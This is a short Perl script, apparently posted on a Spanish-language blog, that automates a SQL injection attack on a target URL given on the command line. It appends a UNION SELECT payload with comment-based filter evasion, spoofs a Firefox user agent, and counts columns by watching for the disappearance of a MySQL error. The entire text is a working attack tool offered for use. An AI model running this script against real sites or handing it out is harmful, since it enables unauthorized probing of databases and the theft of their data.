#!/usr/bin/perl

#By Xianur0
#uxmal666@gmail.com
#http://xianur0.blogspot.com/

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my $uri = $ARGV[0];
$uri = shift || die("Uso: fuzzer.pl [URI a SQL Injection]\n");
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16");
my $inyeccion = "-10/**/UNION/**/SELECT/**/0";
$uri = $uri.$inyeccion;
print $uri;
for($i=1; $i<1000;$i++) {
$uri = "$uri,$i";
$req = HTTP::Request->new(GET => $uri."/*");
print $uri."/*\n";
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content !~ "mysql_num_rows()") { die("Columna Encontrada: ".$uri."/*\n"); }
} else {
die("Servidor no responde Correctamente!\n"); }
}

0 comentarios: